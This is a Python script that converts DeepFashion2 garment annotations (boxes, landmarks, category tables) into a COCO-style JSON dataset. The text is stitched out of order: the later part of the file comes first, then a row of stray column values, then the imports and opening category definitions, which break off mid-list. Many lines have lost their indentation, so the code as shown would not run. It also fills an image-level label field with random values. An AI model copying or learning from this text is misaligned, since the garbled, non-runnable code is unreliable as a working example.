'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 11,
'name': "long_sleeved_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 12,
'name': "vest_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 13,
'name': "sling_dress",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
# categories2
dataset['categories2'].append({
'id': 1,
'name': "commodity",
'supercategory': "fashion",
})
dataset['categories2'].append({
'id': 2,
'name': "model",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 3,
'name': "detail",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 4,
'name': "specification",
'supercategory': "fashion"
})
dataset['categories2'].append({
'id': 5,
'name': "unknown",
'supercategory': "fashion"
})
# dataset['categories2'].append({
# 'id': 0,
# 'name': "ignore",
# 'supercategory': "fashion"
# })
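# lookup tables: category ids grouped by garment part, image-level (categories2) class names, per-category landmark counts, and scale labels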
top_categories = (1, 2, 3, 4, 5, 6)
down_categories = (7, 8, 9)
whole_categories = (10, 11, 12, 13)
categories2_name = ['commodity', 'model', 'detail', 'specification', 'unknown']
part_name = ['ignore', 'top', 'down', 'whole']
total_landmark_nums = [25, 33, 31, 39, 15, 15, 10, 14, 8, 29, 37, 19, 19]
scale_types = ['unknown', 'small', 'modest', 'large']
start_id = 150001
num_images = 41960
root_dir = '/Users/fangcheng.ji/Documents/datasets/deepfashion2/train/'
#root_dir = '/Users/fangcheng.ji/Documents/datasets/deepfashion2/train/'
sub_index = 0 # the index of ground truth instance
sub_index2 = 0 # the index of annotations2 ground truth instance
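# iterate over the image id range, read each per-image annotation json, and emit COCO-style image and annotation records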
for num in range(start_id, start_id + num_images):
json_name = root_dir + 'annos/' + str(num).zfill(6)+'.json'
image_name = root_dir + 'image/' + str(num).zfill(6)+'.jpg'
print("processing {}".format(image_name))
    if num >= 0 and os.path.isfile(image_name):
imag = Image.open(image_name)
width, height = imag.size
items = []
with open(json_name, 'r') as f:
temp = json.loads(f.read())
source = temp['source']
# filter the user data first, only use the shop data in phase 1
if source != 'shop':
continue
pair_id = temp['pair_id']
dataset['images'].append({
'coco_url': '',
'date_captured': '',
'file_name': str(num).zfill(6) + '.jpg',
'flickr_url': '',
'id': num,
'license': 0,
'width': width,
'height': height
})
for i in temp:
                if i == 'source' or i == 'pair_id':
continue
else:
points = np.zeros(294 * 3)
sub_index = sub_index + 1
# bounding box
box = temp[i]['bounding_box']
w = box[2]-box[0]
h = box[3]-box[1]
x_1 = box[0]
y_1 = box[1]
                    bbox = [x_1, y_1, w, h]
# category
cat = temp[i]['category_id']
cat_name = temp[i]['category_name']
# other attribute
style = temp[i]['style']
viewpoint = temp[i]['viewpoint']
scale = temp[i]['scale']
zoom_in = temp[i]['zoom_in']
occlusion = temp[i]['occlusion']
#segmentation and landmarks
seg = temp[i]['segmentation']
landmarks = temp[i]['landmarks']
points_x = landmarks[0::3]
points_y = landmarks[1::3]
points_v = landmarks[2::3]
points_x = np.array(points_x)
points_y = np.array(points_y)
points_v = np.array(points_v)
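                    # copy this item's landmarks into the fixed slice of the 294-point vector reserved for its category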
if cat == 1:
for n in range(0, 25):
points[3 * n] = points_x[n]
points[3 * n + 1] = points_y[n]
points[3 * n + 2] = points_v[n]
                    elif cat == 2:
for n in range(25, 58):
points[3 * n] = points_x[n - 25]
points[3 * n + 1] = points_y[n - 25]
points[3 * n + 2] = points_v[n - 25]
                    elif cat == 3:
for n in range(58, 89):
points[3 * n] = points_x[n - 58]
points[3 * n + 1] = points_y[n - 58]
points[3 * n + 2] = points_v[n - 58]
elif cat == 4:
for n in range(89, 128):
points[3 * n] = points_x[n - 89]
points[3 * n + 1] = points_y[n - 89]
points[3 * n + 2] = points_v[n - 89]
elif cat == 5:
for n in range(128, 143):
points[3 * n] = points_x[n - 128]
points[3 * n + 1] = points_y[n - 128]
points[3 * n + 2] = points_v[n - 128]
elif cat == 6:
for n in range(143, 158):
points[3 * n] = points_x[n - 143]
points[3 * n + 1] = points_y[n - 143]
points[3 * n + 2] = points_v[n - 143]
elif cat == 7:
for n in range(158, 168):
points[3 * n] = points_x[n - 158]
points[3 * n + 1] = points_y[n - 158]
points[3 * n + 2] = points_v[n - 158]
elif cat == 8:
for n in range(168, 182):
points[3 * n] = points_x[n - 168]
points[3 * n + 1] = points_y[n - 168]
points[3 * n + 2] = points_v[n - 168]
elif cat == 9:
for n in range(182, 190):
points[3 * n] = points_x[n - 182]
points[3 * n + 1] = points_y[n - 182]
points[3 * n + 2] = points_v[n - 182]
elif cat == 10:
for n in range(190, 219):
points[3 * n] = points_x[n - 190]
points[3 * n + 1] = points_y[n - 190]
points[3 * n + 2] = points_v[n - 190]
elif cat == 11:
for n in range(219, 256):
points[3 * n] = points_x[n - 219]
points[3 * n + 1] = points_y[n - 219]
points[3 * n + 2] = points_v[n - 219]
elif cat == 12:
for n in range(256, 275):
points[3 * n] = points_x[n - 256]
points[3 * n + 1] = points_y[n - 256]
points[3 * n + 2] = points_v[n - 256]
elif cat == 13:
for n in range(275, 294):
points[3 * n] = points_x[n - 275]
points[3 * n + 1] = points_y[n - 275]
points[3 * n + 2] = points_v[n - 275]
num_points = len(np.where(points_v > 0)[0])
items.append(item(cat, viewpoint, scale, bbox, num_points))
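                    # one COCO-style annotation per garment instance; 'keypoints' is the flattened 294*3 (x, y, visibility) vector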
dataset['annotations'].append({
'area': w*h,
'bbox': bbox,
'category_id': cat,
'id': sub_index,
'pair_id': pair_id,
'image_id': num,
'iscrowd': 0,
'style': style,
'num_keypoints':num_points,
'keypoints':points.tolist()
#'segmentation': seg,
})
# category2_id, part, toward = deepfashion2noah(items, (width, height))
# for test
# if category2_id == 2:
# new_path = image_name.replace('image', categories2_name[category2_id] + '/' + part_name[part])
# else:
# new_path = image_name.replace('image', categories2_name[category2_id])
#
# shutil.move(image_name, new_path)
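            # image-level classification (annotations2) is stubbed out: category2_id is random and every record is flagged ignore=1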
part = 0
toward = 0
sub_index2 += 1
dataset['annotations2'].append({
'image_id': num,
'id': sub_index2,
'category2_id': random.randint(1, 5),
'part': part if part is not None else 0,
'toward': toward if toward is not None else 0,
'ignore': 1 # 1 means ignore the result
})
json_name = root_dir + 'classification_ignore_19w.json'
with open(json_name, 'w') as f:
json.dump(dataset, f)
| 90.548753 | 1,968 | 0.425548 | import json
from PIL import Image
import numpy as np
import shutil
import os
import random
dataset = {
"info": {},
"licenses": [],
"images": [],
"annotations": [],
"annotations2": [],
"categories": [],
"categories2": []
}
dataset['categories'].append({
'id': 1,
'name': "short_sleeved_shirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 2,
'name': "long_sleeved_shirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 3,
'name': "short_sleeved_outwear",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 4,
'name': "long_sleeved_outwear",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 5,
'name': "vest",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 6,
'name': "sling",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 7,
'name': "shorts",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 8,
'name': "trousers",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', '192', '193', '194', '195', '196', '197', '198', '199', '200', '201', '202', '203', '204', '205', '206', '207', '208', '209', '210', '211', '212', '213', '214', '215', '216', '217', '218', '219', '220', '221', '222', '223', '224', '225', '226', '227', '228', '229', '230', '231', '232', '233', '234', '235', '236', '237', '238', '239', '240', '241', '242', '243', '244', '245', '246', '247', '248', '249', '250', '251', '252', '253', '254', '255', '256', '257', '258', '259', '260', '261', '262', '263', '264', '265', '266', '267', '268', '269', '270', '271', '272', '273', '274', '275', '276', '277', '278', '279', '280', '281', '282', '283', '284', '285', '286', '287', '288', '289', '290', '291', '292', '293', '294'],
'skeleton': []
})
dataset['categories'].append({
'id': 9,
'name': "skirt",
'supercategory': "clothes",
'keypoints': ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '30', '31', '32', '33', '34', '35', '36', '37', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55', '56', '57', '58', '59', '60', '61', '62', '63', '64', '65', '66', '67', '68', '69', '70', '71', '72', '73', '74', '75', '76', '77', '78', '79', '80', '81', '82', '83', '84', '85', '86', '87', '88', '89', '90', '91', '92', '93', '94', '95', '96', '97', '98', '99', '100', '101', '102', '103', '104', '105', '106', '107', '108', '109', '110', '111', '112', '113', '114', '115', '116', '117', '118', '119', '120', '121', '122', '123', '124', '125', '126', '127', '128', '129', '130', '131', '132', '133', '134', '135', '136', '137', '138', '139', '140', '141', '142', '143', '144', '145', '146', '147', '148', '149', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159', '160', '161', '162', '163', '164', '165', '166', '167', '168', '169', '170', '171', '172', '173', '174', '175', '176', '177', '178', '179', '180', '181', '182', '183', '184', '185', '186', '187', '188', '189', '190', '191', 